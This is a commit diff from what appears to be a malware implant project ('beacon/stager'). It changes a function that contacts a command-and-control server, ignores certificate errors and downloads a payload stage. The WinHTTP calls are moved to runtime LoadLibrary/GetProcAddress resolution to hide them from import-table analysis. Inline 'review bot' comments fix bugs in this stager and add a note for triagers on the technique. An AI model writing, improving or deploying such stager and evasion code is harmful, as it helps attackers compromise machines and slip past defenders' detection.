hide winhttp imports
brucewayne committed Jun 4, 2020
1 parent 3626703 commit cd89882
Showing 2 changed files with 76 additions and 10 deletions.
28 changes: 18 additions & 10 deletions beacon/stager/callback.c
@@ -1,8 +1,8 @@
#include <windows.h>
#include <winhttp.h>

// #include "base64.h"
#include "settings.h"
#include "imports.h"

#define _CALLBACK_URL L"/stage"
#define _POST_HEADER L"Content-Type: application/x-www-form-urlencoded\r\n"
@@ -26,28 +26,32 @@ CHAR* GetStageFromC2(DWORD* sSize)
SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE;

// init the connection
hSession = WinHttpOpen((LPCWSTR)_CALLBACK_USER_AGENT, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
WinHttpOpen_ rWinHttpOpen = (WinHttpOpen_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpOpen");
hSession = rWinHttpOpen((LPCWSTR)_CALLBACK_USER_AGENT, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
if (!hSession)
{
return NULL;
}

// make the connection
hConnect = WinHttpConnect(hSession, (LPCWSTR)_C2_CALLBACK_ADDRESS, _C2_CALLBACK_PORT, 0);
WinHttpConnect_ rWinHttpConnect = (WinHttpConnect_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpConnect");
hConnect = rWinHttpConnect(hSession, (LPCWSTR)_C2_CALLBACK_ADDRESS, _C2_CALLBACK_PORT, 0);
if (!hConnect)
{
return NULL;
}

// setup our request
hRequest = WinHttpOpenRequest(hConnect, L"POST", _CALLBACK_URL, NULL, NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE | WINHTTP_FLAG_SECURE);
WinHttpOpenRequest_ rWinHttpOpenRequest = (WinHttpOpenRequest_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpOpenRequest");
hRequest = rWinHttpOpenRequest(hConnect, L"POST", _CALLBACK_URL, NULL, NULL, NULL, WINHTTP_FLAG_BYPASS_PROXY_CACHE | WINHTTP_FLAG_SECURE);
if (!hRequest)
{
return NULL;
}

// let us connect with bad ssl certs
if (!WinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &Flags, sizeof(Flags)))
// let us connect with bad ssl certs
WinHttpSetOption_ rWinHttpSetOption = (WinHttpSetOption_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpSetOption");
if (!rWinHttpSetOption(hRequest, WINHTTP_OPTION_SECURITY_FLAGS, &Flags, sizeof(Flags)))
{
return NULL;
}
@@ -73,18 +77,21 @@ CHAR* GetStageFromC2(DWORD* sSize)
#endif

// make the request
bResults = WinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)payload, strlen(payload), strlen(payload), 0);
WinHttpSendRequest_ rWinHttpSendRequest = (WinHttpSendRequest_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpSendRequest");
bResults = rWinHttpSendRequest(hRequest, _POST_HEADER, _HEADER_LEN, (LPVOID)payload, strlen(payload), strlen(payload), 0);

if (bResults)
{
DEBUG("made callback");
bResults = WinHttpReceiveResponse(hRequest, NULL);
WinHttpReceiveResponse_ rWinHttpReceiveResponse = (WinHttpReceiveResponse_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpReceiveResponse");
bResults = rWinHttpReceiveResponse(hRequest, NULL);

do
{
// check how much available data there is
dwSize = 0;
if (!WinHttpQueryDataAvailable( hRequest, &dwSize))
WinHttpQueryDataAvailable_ rWinHttpQueryDataAvailable = (WinHttpQueryDataAvailable_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpQueryDataAvailable");
if (!rWinHttpQueryDataAvailable( hRequest, &dwSize))
{
DEBUG( "Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
break;
@@ -107,7 +114,8 @@ CHAR* GetStageFromC2(DWORD* sSize)
// read all the data
ZeroMemory(pszOutBuffer, dwSize + 1);

if (!WinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
WinHttpReadData_ rWinHttpReadData = (WinHttpReadData_)GetProcAddress(LoadLibrary("winhttp.dll"), "WinHttpReadData");
if (!rWinHttpReadData( hRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
{
// been an error
break;
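Review bot: None of the pointers returned by `GetProcAddress(LoadLibrary("winhttp.dll"), ...)` is checked before it is called, so a failed load or lookup becomes a call through NULL. The same pair is repeated at every call site, including at least `rWinHttpQueryDataAvailable` inside the `do` loop, which raises the module reference count on each pass with no matching `FreeLibrary`. Resolve the module once near the top of GetStageFromC2 and test each result, e.g. `HMODULE hWinHttp = LoadLibraryA("winhttp.dll"); if (!hWinHttp) return NULL;` and then `if (!rWinHttpOpen) return NULL;`. For anyone triaging a binary built from this, WinHTTP use will not show in the import table; run-time resolution through LoadLibrary/GetProcAddress is the behaviour to look for (MITRE ATT&CK T1027.007). GetStageFromC2 starts and ends outside the visible hunks.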
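--- a/beacon/stager/imports.h
+++ b/beacon/stager/imports.h
@@ -0,0 +1,58 @@
+typedef HINTERNET (WINAPI * WinHttpOpen_) (
+LPCWSTR pszAgentW,
+DWORD dwAccessType,
+LPCWSTR pszProxyW,
+LPCWSTR pszProxyBypassW,
+DWORD dwFlags
+);
+
+typedef HINTERNET (WINAPI * WinHttpConnect_) (
+IN HINTERNET hSession,
+IN LPCWSTR pswzServerName,
+IN INTERNET_PORT nServerPort,
+IN DWORD dwReserved
+);
+
+typedef HINTERNET (WINAPI * WinHttpOpenRequest_) (
+IN HINTERNET hConnect,
+IN LPCWSTR pwszVerb,
+IN LPCWSTR pwszObjectName,
+IN LPCWSTR pwszVersion,
+IN LPCWSTR pwszReferrer,
+IN LPCWSTR *ppwszAcceptTypes,
+IN DWORD dwFlags
+);
+
+typedef BOOLAPI (WINAPI * WinHttpSetOption_) (
+HINTERNET hInternet,
+DWORD dwOption,
+LPVOID lpBuffer,
+DWORD dwBufferLength
+);
+
+typedef BOOLAPI (WINAPI * WinHttpSendRequest_) (
+IN HINTERNET hRequest,
+LPCWSTR lpszHeaders,
+IN DWORD dwHeadersLength,
+LPVOID lpOptional,
+IN DWORD dwOptionalLength,
+IN DWORD dwTotalLength,
+IN DWORD_PTR dwContext
+);
+
+typedef BOOLAPI (WINAPI * WinHttpReceiveResponse_) (
+IN HINTERNET hRequest,
+IN LPVOID lpReserved
+);
+
+typedef BOOLAPI (WINAPI * WinHttpQueryDataAvailable_) (
+IN HINTERNET hRequest,
+LPDWORD lpdwNumberOfBytesAvailable
+);
+
+typedef BOOLAPI (WINAPI * WinHttpReadData_) (
+IN HINTERNET hRequest,
+LPVOID lpBuffer,
+IN DWORD dwNumberOfBytesToRead,
+OUT LPDWORD lpdwNumberOfBytesRead
+);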
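Review bot: The five `typedef BOOLAPI (WINAPI * ..._)` declarations use `BOOLAPI` as the return type, but in the SDK headers that macro is, as far as I recall, the full export decoration (import attribute, `BOOL` and calling convention) rather than a plain type, so it does not belong inside a function-pointer typedef. Write `typedef BOOL (WINAPI * WinHttpSetOption_) (` and likewise for the other four. The header also has no include guard and uses `HINTERNET` and `INTERNET_PORT` without including anything, so it only compiles when `<winhttp.h>` precedes it as in callback.c; add `#pragma once` and a comment stating that dependency.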
